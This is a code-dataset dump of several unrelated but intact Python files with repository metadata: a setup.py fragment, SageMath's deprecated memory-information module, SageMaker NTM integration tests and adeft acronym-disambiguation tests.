        'Programming Language :: Python :: 3.4',
        'License :: OSI Approved :: ISC License (ISCL)',
        'Topic :: Scientific/Engineering :: Information Analysis',
        'Natural Language :: English',
    ],
    keywords=['graph mining', 'node centrality', 'random walks',
              'algorithms', 'data mining'],
    install_requires=['networkx>=1.9.1', 'numpy==1.9.2', 'scipy==0.16'],
    extras_require={'tests': tests_require},
)
| true | true |
f7325fa0e342ce06f43789c08ccef69fbef643ab | 14,935 | py | Python | src/sage/misc/memory_info.py | bopopescu/sage | 2d495be78e0bdc7a0a635454290b27bb4f5f70f0 | [
"BSL-1.0"
] | 3 | 2019-07-15T13:48:24.000Z | 2019-11-08T12:31:43.000Z | src/sage/misc/memory_info.py | bopopescu/sage | 2d495be78e0bdc7a0a635454290b27bb4f5f70f0 | [
"BSL-1.0"
] | 2 | 2018-10-30T13:40:20.000Z | 2020-07-23T12:13:30.000Z | src/sage/misc/memory_info.py | bopopescu/sage | 2d495be78e0bdc7a0a635454290b27bb4f5f70f0 | [
"BSL-1.0"
] | 7 | 2021-11-08T10:01:59.000Z | 2022-03-03T11:25:52.000Z | """
Information about available RAM/swap
There is no portable way to figure these out, nor should you generally
have to. But GAP currently needs to allocate a cache of fixed size
upon startup, and we would like a certain fraction of the swap address
space.
EXAMPLES::
sage: from sage.misc.memory_info import MemoryInfo, MemoryInfo_proc
doctest:...
DeprecationWarning: the module sage.misc.memory_info is deprecated, use the psutil package instead.
See http://trac.sagemath.org/21805 for details.
sage: mem = MemoryInfo()
sage: mem.total_ram() # random output
16708194304
sage: mem.available_ram() # random output
1690738688
sage: mem.total_swap() # random output
15728635904
sage: mem.available_swap() # random output
15340593152
"""
#*****************************************************************************
# Copyright (C) 2012 Volker Braun <vbraun.name@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
# http://www.gnu.org/licenses/
#*****************************************************************************
from sage.misc.superseded import deprecation
deprecation(21805, "the module sage.misc.memory_info is deprecated, use the psutil package instead.")
import subprocess
from sys import maxsize
from sage.structure.sage_object import SageObject
memory_info_instance = None
def MemoryInfo():
    """
    Return a singleton object describing the host's memory.

    The first call probes the host: ``/proc/meminfo`` on non-Darwin
    systems, the ``top`` utility on Darwin, and fixed guesses when
    neither probe succeeds.  Subsequent calls return the cached object.

    OUTPUT:

    An instance of a :class:`MemoryInfo_base` subclass.
    """
    global memory_info_instance
    if memory_info_instance is not None:
        return memory_info_instance
    import platform
    on_darwin = (platform.system() == 'Darwin')
    if on_darwin:
        try:
            memory_info_instance = MemoryInfo_OSX()
        except OSError:
            pass
    else:
        try:
            memory_info_instance = MemoryInfo_proc()
        except OSError:
            pass
    if memory_info_instance is None:
        # Neither probe worked; fall back to hard-coded guesses.
        memory_info_instance = MemoryInfo_guess()
    return memory_info_instance
class MemoryInfo_base(SageObject):
    """
    Base class for the platform-specific memory info objects.

    Subclasses provide :meth:`total_ram`, :meth:`available_ram`,
    :meth:`total_swap` and :meth:`available_swap`; this class supplies
    the derived quantities that only depend on those.
    """
    def rlimit_address_space(self):
        """
        Return the ``RLIMIT_AS`` address-space limit of this process.

        OUTPUT:

        Integer. The limit in bytes, or `-1` if no limit is set or the
        limit cannot be determined.
        """
        import resource
        try:
            limit = resource.getrlimit(resource.RLIMIT_AS)[0]
        except resource.error:
            return -1
        if limit == resource.RLIM_INFINITY:
            return -1
        return limit
    def virtual_memory_limit(self):
        """
        Return the upper limit for virtual memory usage.

        This is the value set by ``ulimit -v`` at the command line
        (bounded by ``sys.maxsize``) or, if no limit is set, the total
        RAM plus the total swap of the machine.

        OUTPUT:

        Integer. The virtual memory limit in bytes.
        """
        limit = self.rlimit_address_space()
        if limit < 0:
            # No explicit rlimit: estimate from physical RAM + swap.
            limit = self.total_swap() + self.total_ram()
        # Cap at sys.maxsize so the value is always a usable Python int.
        return min(maxsize, limit)
class MemoryInfo_proc(MemoryInfo_base):
    """
    Provide memory information from the ``/proc`` pseudo-filesystem.

    Available on Linux and most other UNIXes exposing ``/proc/meminfo``.
    Raises ``OSError`` on construction if the file is missing or cannot
    be parsed.
    """
    def __init__(self):
        try:
            self._parse_proc_meminfo()
        except (IOError, ValueError):
            raise OSError('/proc/meminfo is not available')
    def _parse_proc_meminfo(self):
        """
        Parse ``/proc/meminfo``.

        OUTPUT:

        A dictionary with at least the keys ``'total_ram'``,
        ``'available_ram'``, ``'total_swap'`` and ``'free_swap'``
        (plus ``'Committed_AS'`` when the kernel reports it).
        All sizes are in bytes.
        """
        kb = 1024
        result = dict()
        # Context manager guarantees the handle is closed even when a
        # line fails to parse (the previous code leaked it on error).
        with open('/proc/meminfo', 'r') as meminfo:
            for line in meminfo:
                line = line.split()
                if line[0].startswith('MemTotal') and line[2] == 'kB':
                    result['total_ram'] = int(line[1]) * kb
                if line[0].startswith('MemFree') and line[2] == 'kB':
                    result['available_ram'] = int(line[1]) * kb
                if line[0].startswith('SwapTotal') and line[2] == 'kB':
                    result['total_swap'] = int(line[1]) * kb
                if line[0].startswith('SwapFree') and line[2] == 'kB':
                    result['free_swap'] = int(line[1]) * kb
                if line[0].startswith('Committed_AS') and line[2] == 'kB':
                    result['Committed_AS'] = int(line[1]) * kb
        required = set(['available_ram', 'total_swap', 'free_swap', 'total_ram'])
        if not required.issubset(result.keys()):
            raise OSError('failed to parse /proc/meminfo correctly')
        return result
    def total_ram(self):
        """Return the total RAM size in bytes."""
        return self._parse_proc_meminfo()['total_ram']
    def available_ram(self):
        """Return the available (free) RAM size in bytes."""
        return self._parse_proc_meminfo()['available_ram']
    def total_swap(self):
        """Return the total swap size in bytes."""
        return self._parse_proc_meminfo()['total_swap']
    def available_swap(self):
        """
        Return the available (free) swap size in bytes.

        Excludes reserved swap space when the kernel reports
        ``Committed_AS``; the result can be negative if the system is
        overcommitting memory.
        """
        info = self._parse_proc_meminfo()
        try:
            return info['total_swap'] - info['Committed_AS']
        except KeyError:
            return info['free_swap']
class MemoryInfo_OSX(MemoryInfo_base):
    """
    Provide memory information on OSX by parsing the output of ``top``.

    Raises ``OSError`` on construction if ``top`` cannot be run or its
    output cannot be parsed.
    """
    def __init__(self):
        self._maxage = 10 # cache "top" output for 10 seconds
        self._age = -self._maxage
        try:
            self._parse_top()
        except (IOError, ValueError, subprocess.CalledProcessError, KeyError):
            raise OSError('failed to parse OSX "top" output')
    def _parse_top_output(self, meminfo):
        """
        Pick total and available memory out of the "top" output.

        INPUT:

        - ``meminfo`` -- string; output of the ``top`` utility.

        OUTPUT:

        A dictionary with keys ``'total_ram'`` and ``'available_ram'``,
        both in bytes.  Raises ``OSError`` if no parseable ``PhysMem:``
        line is found.
        """
        units = { 'K': 1024, 'M':1024**2, 'G':1024**3 }
        for line in meminfo.splitlines():
            if not line.startswith('PhysMem:'):
                continue
            line = line.split()
            # Both the old (PPC) and newer (x86) formats end in
            # "... <used> used, <free> free", possibly with a trailing dot.
            if not line[-1].startswith('free') or not line[-3].startswith('used'):
                raise OSError('failed to parse PhysMem: line in "top" output')
            used_ram = line[-4]
            free_ram = line[-2]
            # Strip the K/M/G unit suffix and scale to bytes.
            used_ram = int( float(used_ram[:-1]) * units[used_ram[-1]])
            free_ram = int( float(free_ram[:-1]) * units[free_ram[-1]])
            return { 'total_ram': used_ram + free_ram,
                     'available_ram': free_ram }
        raise OSError('failed to parse "top" output, no PhysMem: section')
    def _parse_top(self):
        """
        Run ``top`` and parse its output, caching the result.

        The parsed dictionary is cached for ``self._maxage`` seconds so
        repeated queries do not spawn a subprocess each time.

        OUTPUT:

        A dictionary with keys ``'total_ram'`` and ``'available_ram'``,
        both in bytes.
        """
        import time
        if (time.time()-self._age) < self._maxage:
            return self._parse_top_cache
        meminfo = subprocess.check_output(['top', '-l', '1'],
                                          stderr=subprocess.STDOUT)
        result = self._parse_top_output(meminfo)
        self._age = time.time()
        self._parse_top_cache = result
        return result
    def total_ram(self):
        """Return the total RAM size in bytes."""
        return self._parse_top()['total_ram']
    def available_ram(self):
        """Return the available (free) RAM size in bytes."""
        return self._parse_top()['available_ram']
    def total_swap(self):
        """
        Return the total swap size in bytes.

        The OSX swap file grows dynamically, so this is estimated as
        twice the total RAM.
        """
        return 2*self.total_ram()
    def available_swap(self):
        """
        Return the available (free) swap size in bytes.

        The OSX swap file grows dynamically, so this is estimated as
        twice the available RAM.
        """
        return 2*self.available_ram()
class MemoryInfo_guess(MemoryInfo_base):
    """
    Fallback memory information when no OS-specific probe works.

    Every quantity is a fixed guess: 4 GiB of RAM and 4 GiB of swap,
    all of which is reported as available.
    """
    def total_ram(self):
        """Return the guessed total RAM size (4 GiB) in bytes."""
        return 4 * 1024 ** 3
    def available_ram(self):
        """Return the guessed available RAM size in bytes."""
        return self.total_ram()
    def total_swap(self):
        """Return the guessed total swap size (4 GiB) in bytes."""
        return 4 * 1024 ** 3
    def available_swap(self):
        """Return the guessed available swap size in bytes."""
        return self.total_swap()
| 28.666027 | 108 | 0.566856 |
from sage.misc.superseded import deprecation
deprecation(21805, "the module sage.misc.memory_info is deprecated, use the psutil package instead.")
import subprocess
from sys import maxsize
from sage.structure.sage_object import SageObject
memory_info_instance = None
def MemoryInfo():
    """
    Return a singleton with information about available RAM and swap.

    Probes ``/proc/meminfo`` on non-Darwin systems, ``top`` on Darwin,
    and falls back to fixed guesses; the result is cached.
    """
    global memory_info_instance
    if memory_info_instance is not None:
        return memory_info_instance
    import platform
    system = platform.system()
    if memory_info_instance is None and \
       system != 'Darwin':
        try:
            memory_info_instance = MemoryInfo_proc()
        except OSError:
            pass
    if memory_info_instance is None and \
       system == 'Darwin':
        try:
            memory_info_instance = MemoryInfo_OSX()
        except OSError:
            pass
    if memory_info_instance is None:
        # Last resort: hard-coded guesses.
        memory_info_instance = MemoryInfo_guess()
    return memory_info_instance
class MemoryInfo_base(SageObject):
    """Base class for memory info objects."""
    def rlimit_address_space(self):
        """Return ``RLIMIT_AS`` in bytes, or `-1` if unset or unknown."""
        import resource
        try:
            limit = resource.getrlimit(resource.RLIMIT_AS)[0]
        except resource.error:
            return -1
        if limit == resource.RLIM_INFINITY:
            return -1
        return limit
    def virtual_memory_limit(self):
        """
        Return the upper limit for virtual memory usage in bytes:
        the ``ulimit -v`` value (capped at ``sys.maxsize``) or, when no
        limit is set, total RAM plus total swap.
        """
        limit = self.rlimit_address_space()
        if limit < 0:
            limit = self.total_swap() + self.total_ram()
        return min(maxsize, limit)
class MemoryInfo_proc(MemoryInfo_base):
    """Memory information from the ``/proc`` pseudo-filesystem."""
    def __init__(self):
        try:
            self._parse_proc_meminfo()
        except (IOError, ValueError):
            raise OSError('/proc/meminfo is not available')
    def _parse_proc_meminfo(self):
        """Parse ``/proc/meminfo``; return a dict of sizes in bytes."""
        kb = 1024
        result = dict()
        meminfo = open('/proc/meminfo', 'r')
        for line in meminfo.readlines():
            line = line.split()
            if line[0].startswith('MemTotal') and line[2] == 'kB':
                result['total_ram'] = int(line[1]) * kb
            if line[0].startswith('MemFree') and line[2] == 'kB':
                result['available_ram'] = int(line[1]) * kb
            if line[0].startswith('SwapTotal') and line[2] == 'kB':
                result['total_swap'] = int(line[1]) * kb
            if line[0].startswith('SwapFree') and line[2] == 'kB':
                result['free_swap'] = int(line[1]) * kb
            if line[0].startswith('Committed_AS') and line[2] == 'kB':
                result['Committed_AS'] = int(line[1]) * kb
        meminfo.close()
        required = set(['available_ram', 'total_swap', 'free_swap', 'total_ram'])
        if not required.issubset(result.keys()):
            raise OSError('failed to parse /proc/meminfo correctly')
        return result
    def total_ram(self):
        """Return the total RAM size in bytes."""
        return self._parse_proc_meminfo()['total_ram']
    def available_ram(self):
        """Return the available (free) RAM size in bytes."""
        return self._parse_proc_meminfo()['available_ram']
    def total_swap(self):
        """Return the total swap size in bytes."""
        return self._parse_proc_meminfo()['total_swap']
    def available_swap(self):
        """Return free swap in bytes; may be negative when overcommitting."""
        info = self._parse_proc_meminfo()
        try:
            return info['total_swap'] - info['Committed_AS']
        except KeyError:
            return info['free_swap']
class MemoryInfo_OSX(MemoryInfo_base):
    """Memory information on OSX, parsed from the output of ``top``."""
    def __init__(self):
        self._maxage = 10  # cache "top" output for 10 seconds
        self._age = -self._maxage
        try:
            self._parse_top()
        except (IOError, ValueError, subprocess.CalledProcessError, KeyError):
            raise OSError('failed to parse OSX "top" output')
    def _parse_top_output(self, meminfo):
        """Extract total/available RAM (bytes) from a ``PhysMem:`` line."""
        units = { 'K': 1024, 'M':1024**2, 'G':1024**3 }
        for line in meminfo.splitlines():
            if not line.startswith('PhysMem:'):
                continue
            line = line.split()
            if not line[-1].startswith('free') or not line[-3].startswith('used'):
                raise OSError('failed to parse PhysMem: line in "top" output')
            used_ram = line[-4]
            free_ram = line[-2]
            # Strip the K/M/G unit suffix and scale to bytes.
            used_ram = int( float(used_ram[:-1]) * units[used_ram[-1]])
            free_ram = int( float(free_ram[:-1]) * units[free_ram[-1]])
            return { 'total_ram': used_ram + free_ram,
                     'available_ram': free_ram }
        raise OSError('failed to parse "top" output, no PhysMem: section')
    def _parse_top(self):
        """Run ``top`` and parse it, caching for ``self._maxage`` seconds."""
        import time
        if (time.time()-self._age) < self._maxage:
            return self._parse_top_cache
        meminfo = subprocess.check_output(['top', '-l', '1'],
                                          stderr=subprocess.STDOUT)
        result = self._parse_top_output(meminfo)
        self._age = time.time()
        self._parse_top_cache = result
        return result
    def total_ram(self):
        """Return the total RAM size in bytes."""
        return self._parse_top()['total_ram']
    def available_ram(self):
        """Return the available (free) RAM size in bytes."""
        return self._parse_top()['available_ram']
    def total_swap(self):
        """Return estimated total swap (twice total RAM) in bytes."""
        return 2*self.total_ram()
    def available_swap(self):
        """Return estimated free swap (twice available RAM) in bytes."""
        return 2*self.available_ram()
class MemoryInfo_guess(MemoryInfo_base):
    """Fallback: fixed guesses (4 GiB RAM, 4 GiB swap, all available)."""
    def total_ram(self):
        """Return the guessed total RAM size in bytes."""
        GB = 1024 * 1024 * 1024
        return 4*GB
    def available_ram(self):
        """Return the guessed available RAM size in bytes."""
        return self.total_ram()
    def total_swap(self):
        """Return the guessed total swap size in bytes."""
        GB = 1024 * 1024 * 1024
        return 4*GB
    def available_swap(self):
        """Return the guessed available swap size in bytes."""
        return self.total_swap()
| true | true |
f73260433b527d8ba6321087e688077524d361a8 | 3,993 | py | Python | tests/integ/test_ntm.py | satishpasumarthi/sagemaker-python-sdk | 255a339ae985041ef47e3a80da91b9f54bca17b9 | [
"Apache-2.0"
] | 1 | 2021-12-10T16:18:29.000Z | 2021-12-10T16:18:29.000Z | tests/integ/test_ntm.py | satishpasumarthi/sagemaker-python-sdk | 255a339ae985041ef47e3a80da91b9f54bca17b9 | [
"Apache-2.0"
] | 20 | 2021-09-17T20:50:11.000Z | 2021-12-09T00:29:02.000Z | tests/integ/test_ntm.py | satishpasumarthi/sagemaker-python-sdk | 255a339ae985041ef47e3a80da91b9f54bca17b9 | [
"Apache-2.0"
] | null | null | null | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from __future__ import absolute_import
import os
import numpy as np
import pytest
from sagemaker import NTM, NTMModel, Predictor
from sagemaker.amazon.common import read_records
from sagemaker.serverless import ServerlessInferenceConfig
from sagemaker.utils import unique_name_from_base
from tests.integ import DATA_DIR, TRAINING_DEFAULT_TIMEOUT_MINUTES
from tests.integ.timeout import timeout, timeout_and_delete_endpoint_by_name
from tests.integ.record_set import prepare_record_set_from_local_files
@pytest.mark.release
@pytest.mark.skip(
    reason="This test has always failed, but the failure was masked by a bug. "
    "This test should be fixed. Details in https://github.com/aws/sagemaker-python-sdk/pull/968"
)
def test_ntm(sagemaker_session, cpu_instance_type):
    """Train an NTM on the NIPS record set, deploy it, and predict."""
    job_name = unique_name_from_base("ntm")
    with timeout(minutes=TRAINING_DEFAULT_TIMEOUT_MINUTES):
        data_path = os.path.join(DATA_DIR, "ntm")
        data_filename = "nips-train_1.pbr"
        with open(os.path.join(data_path, data_filename), "rb") as f:
            all_records = read_records(f)
        # Take the feature dimension from the first record; all records in
        # the file are assumed to share that dimension.
        feature_num = int(all_records[0].features["values"].float32_tensor.shape[0])
        ntm = NTM(
            role="SageMakerRole",
            instance_count=1,
            instance_type=cpu_instance_type,
            num_topics=10,
            sagemaker_session=sagemaker_session,
        )
        record_set = prepare_record_set_from_local_files(
            data_path, ntm.data_location, len(all_records), feature_num, sagemaker_session
        )
        ntm.fit(records=record_set, job_name=job_name)
    # The context manager deletes the endpoint even when assertions fail.
    with timeout_and_delete_endpoint_by_name(job_name, sagemaker_session):
        model = NTMModel(ntm.model_data, role="SageMakerRole", sagemaker_session=sagemaker_session)
        predictor = model.deploy(1, cpu_instance_type, endpoint_name=job_name)
        predict_input = np.random.rand(1, feature_num)
        result = predictor.predict(predict_input)
        assert len(result) == 1
        for record in result:
            assert record.label["topic_weights"] is not None
def test_ntm_serverless_inference(sagemaker_session, cpu_instance_type):
    """Train an NTM and deploy it to a serverless inference endpoint."""
    job_name = unique_name_from_base("ntm-serverless")
    with timeout(minutes=TRAINING_DEFAULT_TIMEOUT_MINUTES):
        data_path = os.path.join(DATA_DIR, "ntm")
        data_filename = "nips-train_1.pbr"
        with open(os.path.join(data_path, data_filename), "rb") as f:
            all_records = read_records(f)
        # Take the feature dimension from the first record; all records in
        # the file are assumed to share that dimension.
        feature_num = int(all_records[0].features["values"].float32_tensor.shape[0])
        ntm = NTM(
            role="SageMakerRole",
            instance_count=1,
            instance_type=cpu_instance_type,
            num_topics=10,
            sagemaker_session=sagemaker_session,
        )
        record_set = prepare_record_set_from_local_files(
            data_path, ntm.data_location, len(all_records), feature_num, sagemaker_session
        )
        ntm.fit(records=record_set, job_name=job_name)
    # The context manager deletes the endpoint even when assertions fail.
    with timeout_and_delete_endpoint_by_name(job_name, sagemaker_session):
        model = NTMModel(ntm.model_data, role="SageMakerRole", sagemaker_session=sagemaker_session)
        predictor = model.deploy(
            serverless_inference_config=ServerlessInferenceConfig(), endpoint_name=job_name
        )
        assert isinstance(predictor, Predictor)
| 38.394231 | 99 | 0.717506 |
from __future__ import absolute_import
import os
import numpy as np
import pytest
from sagemaker import NTM, NTMModel, Predictor
from sagemaker.amazon.common import read_records
from sagemaker.serverless import ServerlessInferenceConfig
from sagemaker.utils import unique_name_from_base
from tests.integ import DATA_DIR, TRAINING_DEFAULT_TIMEOUT_MINUTES
from tests.integ.timeout import timeout, timeout_and_delete_endpoint_by_name
from tests.integ.record_set import prepare_record_set_from_local_files
@pytest.mark.release
@pytest.mark.skip(
reason="This test has always failed, but the failure was masked by a bug. "
"This test should be fixed. Details in https://github.com/aws/sagemaker-python-sdk/pull/968"
)
def test_ntm(sagemaker_session, cpu_instance_type):
job_name = unique_name_from_base("ntm")
with timeout(minutes=TRAINING_DEFAULT_TIMEOUT_MINUTES):
data_path = os.path.join(DATA_DIR, "ntm")
data_filename = "nips-train_1.pbr"
with open(os.path.join(data_path, data_filename), "rb") as f:
all_records = read_records(f)
feature_num = int(all_records[0].features["values"].float32_tensor.shape[0])
ntm = NTM(
role="SageMakerRole",
instance_count=1,
instance_type=cpu_instance_type,
num_topics=10,
sagemaker_session=sagemaker_session,
)
record_set = prepare_record_set_from_local_files(
data_path, ntm.data_location, len(all_records), feature_num, sagemaker_session
)
ntm.fit(records=record_set, job_name=job_name)
with timeout_and_delete_endpoint_by_name(job_name, sagemaker_session):
model = NTMModel(ntm.model_data, role="SageMakerRole", sagemaker_session=sagemaker_session)
predictor = model.deploy(1, cpu_instance_type, endpoint_name=job_name)
predict_input = np.random.rand(1, feature_num)
result = predictor.predict(predict_input)
assert len(result) == 1
for record in result:
assert record.label["topic_weights"] is not None
def test_ntm_serverless_inference(sagemaker_session, cpu_instance_type):
job_name = unique_name_from_base("ntm-serverless")
with timeout(minutes=TRAINING_DEFAULT_TIMEOUT_MINUTES):
data_path = os.path.join(DATA_DIR, "ntm")
data_filename = "nips-train_1.pbr"
with open(os.path.join(data_path, data_filename), "rb") as f:
all_records = read_records(f)
feature_num = int(all_records[0].features["values"].float32_tensor.shape[0])
ntm = NTM(
role="SageMakerRole",
instance_count=1,
instance_type=cpu_instance_type,
num_topics=10,
sagemaker_session=sagemaker_session,
)
record_set = prepare_record_set_from_local_files(
data_path, ntm.data_location, len(all_records), feature_num, sagemaker_session
)
ntm.fit(records=record_set, job_name=job_name)
with timeout_and_delete_endpoint_by_name(job_name, sagemaker_session):
model = NTMModel(ntm.model_data, role="SageMakerRole", sagemaker_session=sagemaker_session)
predictor = model.deploy(
serverless_inference_config=ServerlessInferenceConfig(), endpoint_name=job_name
)
assert isinstance(predictor, Predictor)
| true | true |
f7326090f8bedc0b5a1973fcdc6eeb702c6723dc | 4,197 | py | Python | adeft/tests/test_disambiguate.py | johnbachman/deft | 3643dd33ba4cb548f7622f24a3b87fbe48e38050 | [
"BSD-2-Clause"
] | null | null | null | adeft/tests/test_disambiguate.py | johnbachman/deft | 3643dd33ba4cb548f7622f24a3b87fbe48e38050 | [
"BSD-2-Clause"
] | null | null | null | adeft/tests/test_disambiguate.py | johnbachman/deft | 3643dd33ba4cb548f7622f24a3b87fbe48e38050 | [
"BSD-2-Clause"
] | null | null | null | import os
import uuid
import json
import shutil
import logging
from nose.tools import raises
from numpy import array_equal
from adeft.modeling.classify import load_model
from adeft.locations import TEST_RESOURCES_PATH
from adeft.disambiguate import AdeftDisambiguator, load_disambiguator
logger = logging.getLogger(__name__)
# Get test model path so we can write a temporary file here
TEST_MODEL_PATH = os.path.join(TEST_RESOURCES_PATH, 'test_model')
# Path to scratch directory to write files to during tests
SCRATCH_PATH = os.path.join(TEST_RESOURCES_PATH, 'scratch')
example1 = ('The insulin receptor (IR) is a transmembrane receptor that'
' is activated by insulin, IGF-I, IGF-II and belongs to the large'
' class of tyrosine kinase receptors')
example2 = ('The insulin receptor (IR) is a transmembrane receptor that'
' is activated by insulin, IGF-I, IGF-II and belongs to the large'
' class of tyrosine kinase receptors. Insulin resistance (IR)'
' is considered as a pathological condition in which cells fail'
' to respond normally to the hormone insulin')
example3 = ('IR is a transmembrane receptor that is activated by insulin,'
' IGF-1, IFG-II and belongs to the large class of tyrosine'
' kinase receptors')
def test_load_disambiguator():
    """A disambiguator restored from disk exposes the expected attributes."""
    disambiguator = load_disambiguator('IR', path=TEST_MODEL_PATH)
    assert disambiguator.shortforms == ['IR']
    for attribute in ('classifier', 'recognizers'):
        assert hasattr(disambiguator, attribute)
def test_dump_disambiguator():
    """Round-tripping a disambiguator through dump/load preserves state."""
    original = load_disambiguator('IR', path=TEST_MODEL_PATH)
    dirname = uuid.uuid4().hex
    original.dump(dirname, path=SCRATCH_PATH)
    restored = load_disambiguator('IR', path=SCRATCH_PATH)
    assert original.grounding_dict == restored.grounding_dict
    assert original.names == restored.names
    assert original.pos_labels == restored.pos_labels
    coef_before = original.classifier.estimator.named_steps['logit'].coef_
    coef_after = restored.classifier.estimator.named_steps['logit'].coef_
    assert array_equal(coef_before, coef_after)
    assert original.info() == restored.info(), (original.info(), restored.info())
    # Best-effort cleanup of the scratch directory; failures only warn.
    try:
        shutil.rmtree(os.path.join(SCRATCH_PATH, dirname))
    except Exception:
        logger.warning('Could not clean up temporary folder %s'
                       % os.path.join(SCRATCH_PATH, dirname))
def test_disambiguate():
    """Check disambiguation on texts with and without defining patterns."""
    test_model = load_model(os.path.join(TEST_MODEL_PATH, 'IR',
                                         'IR_model.gz'))
    with open(os.path.join(TEST_MODEL_PATH, 'IR',
                           'IR_grounding_dict.json')) as f:
        grounding_dict = json.load(f)
    with open(os.path.join(TEST_MODEL_PATH, 'IR',
                           'IR_names.json')) as f:
        names = json.load(f)
    ad = AdeftDisambiguator(test_model, grounding_dict, names)
    # case where there is a unique defining pattern: grounding is certain
    disamb1 = ad.disambiguate(example1)
    assert disamb1[0] == 'HGNC:6091'
    assert disamb1[1] == 'INSR'
    assert disamb1[2]['HGNC:6091'] == 1.0
    assert disamb1[2]['MESH:D011839'] == 0.0
    # case where there are conflicting defining patterns: probability is
    # split between the competing groundings
    disamb2 = ad.disambiguate(example2)
    preds = disamb2[2]
    nonzero = {key for key, value in preds.items() if value > 0.0}
    assert nonzero == {'HGNC:6091', 'MESH:D007333'}
    # case without a defining pattern: fall back to the ML classifier
    disamb3 = ad.disambiguate(example3)
    assert disamb3[0] == 'HGNC:6091'
    assert disamb3[1] == 'INSR'
def test_modify_groundings():
    """Updating a grounding propagates to every structure that stores it."""
    ad = load_disambiguator('IR', path=TEST_MODEL_PATH)
    ad.modify_groundings(new_groundings={'HGNC:6091': 'UP:P06213'},
                         new_names={'HGNC:6091': 'Insulin Receptor'})
    new_grounding = 'UP:P06213'
    assert new_grounding in ad.pos_labels
    assert new_grounding in ad.classifier.pos_labels
    assert new_grounding in ad.classifier.estimator.classes_
    assert new_grounding in ad.names
    assert new_grounding in ad.grounding_dict['IR'].values()
    assert ad.names[new_grounding] == 'Insulin Receptor'
@raises(ValueError)
def test_modify_groundings_error():
    """Remapping a grounding onto one already in use raises ValueError."""
    disambiguator = load_disambiguator('IR', path=TEST_MODEL_PATH)
    disambiguator.modify_groundings(new_groundings={'MESH:D011839': 'HGNC:6091'})
| 38.154545 | 78 | 0.679295 | import os
import uuid
import json
import shutil
import logging
from nose.tools import raises
from numpy import array_equal
from adeft.modeling.classify import load_model
from adeft.locations import TEST_RESOURCES_PATH
from adeft.disambiguate import AdeftDisambiguator, load_disambiguator
logger = logging.getLogger(__name__)
TEST_MODEL_PATH = os.path.join(TEST_RESOURCES_PATH, 'test_model')
SCRATCH_PATH = os.path.join(TEST_RESOURCES_PATH, 'scratch')
example1 = ('The insulin receptor (IR) is a transmembrane receptor that'
' is activated by insulin, IGF-I, IGF-II and belongs to the large'
' class of tyrosine kinase receptors')
example2 = ('The insulin receptor (IR) is a transmembrane receptor that'
' is activated by insulin, IGF-I, IGF-II and belongs to the large'
' class of tyrosine kinase receptors. Insulin resistance (IR)'
' is considered as a pathological condition in which cells fail'
' to respond normally to the hormone insulin')
example3 = ('IR is a transmembrane receptor that is activated by insulin,'
' IGF-1, IFG-II and belongs to the large class of tyrosine'
' kinase receptors')
def test_load_disambiguator():
    """A disambiguator restored from disk exposes the expected attributes."""
    ad = load_disambiguator('IR', path=TEST_MODEL_PATH)
    assert ad.shortforms == ['IR']
    assert hasattr(ad, 'classifier')
    assert hasattr(ad, 'recognizers')
def test_dump_disambiguator():
    """Round-tripping a disambiguator through dump/load preserves state."""
    ad1 = load_disambiguator('IR', path=TEST_MODEL_PATH)
    tempname = uuid.uuid4().hex
    ad1.dump(tempname, path=SCRATCH_PATH)
    ad2 = load_disambiguator('IR', path=SCRATCH_PATH)
    assert ad1.grounding_dict == ad2.grounding_dict
    assert ad1.names == ad2.names
    assert ad1.pos_labels == ad2.pos_labels
    assert (array_equal(ad1.classifier.estimator.named_steps['logit'].coef_,
                        ad2.classifier.estimator.named_steps['logit'].coef_))
    assert ad1.info() == ad2.info(), (ad1.info(), ad2.info())
    # Best-effort cleanup of the scratch directory; failures only warn.
    try:
        shutil.rmtree(os.path.join(SCRATCH_PATH, tempname))
    except Exception:
        logger.warning('Could not clean up temporary folder %s'
                       % os.path.join(SCRATCH_PATH, tempname))
def test_disambiguate():
    """Check disambiguation on texts with and without defining patterns."""
    test_model = load_model(os.path.join(TEST_MODEL_PATH, 'IR',
                                         'IR_model.gz'))
    with open(os.path.join(TEST_MODEL_PATH, 'IR',
                           'IR_grounding_dict.json')) as f:
        grounding_dict = json.load(f)
    with open(os.path.join(TEST_MODEL_PATH, 'IR',
                           'IR_names.json')) as f:
        names = json.load(f)
    ad = AdeftDisambiguator(test_model, grounding_dict, names)
    # unique defining pattern: grounding is certain
    disamb1 = ad.disambiguate(example1)
    assert disamb1[0] == 'HGNC:6091'
    assert disamb1[1] == 'INSR'
    assert disamb1[2]['HGNC:6091'] == 1.0
    assert disamb1[2]['MESH:D011839'] == 0.0
    # conflicting defining patterns: probability split between groundings
    disamb2 = ad.disambiguate(example2)
    preds = disamb2[2]
    nonzero = {key for key, value in preds.items() if value > 0.0}
    assert nonzero == {'HGNC:6091', 'MESH:D007333'}
    # no defining pattern: fall back to the ML classifier
    disamb3 = ad.disambiguate(example3)
    assert disamb3[0] == 'HGNC:6091'
    assert disamb3[1] == 'INSR'
def test_modify_groundings():
    """Updating a grounding propagates to every structure that stores it."""
    ad = load_disambiguator('IR', path=TEST_MODEL_PATH)
    ad.modify_groundings(new_groundings={'HGNC:6091': 'UP:P06213'},
                         new_names={'HGNC:6091': 'Insulin Receptor'})
    assert 'UP:P06213' in ad.pos_labels
    assert 'UP:P06213' in ad.classifier.pos_labels
    assert 'UP:P06213' in ad.classifier.estimator.classes_
    assert 'UP:P06213' in ad.names
    assert 'UP:P06213' in ad.grounding_dict['IR'].values()
    assert ad.names['UP:P06213'] == 'Insulin Receptor'
@raises(ValueError)
def test_modify_groundings_error():
    """Remapping a grounding onto one already in use raises ValueError."""
    ad = load_disambiguator('IR', path=TEST_MODEL_PATH)
    ad.modify_groundings(new_groundings={'MESH:D011839': 'HGNC:6091'})
| true | true |
f73260e91d1ae454fee4867788ff917e7a7743be | 22,733 | py | Python | python/venv/lib/python2.7/site-packages/openstackclient/tests/volume/v1/test_volume.py | sjsucohort6/openstack | 8471e6e599c3f52319926a582358358ef84cbadb | [
"MIT"
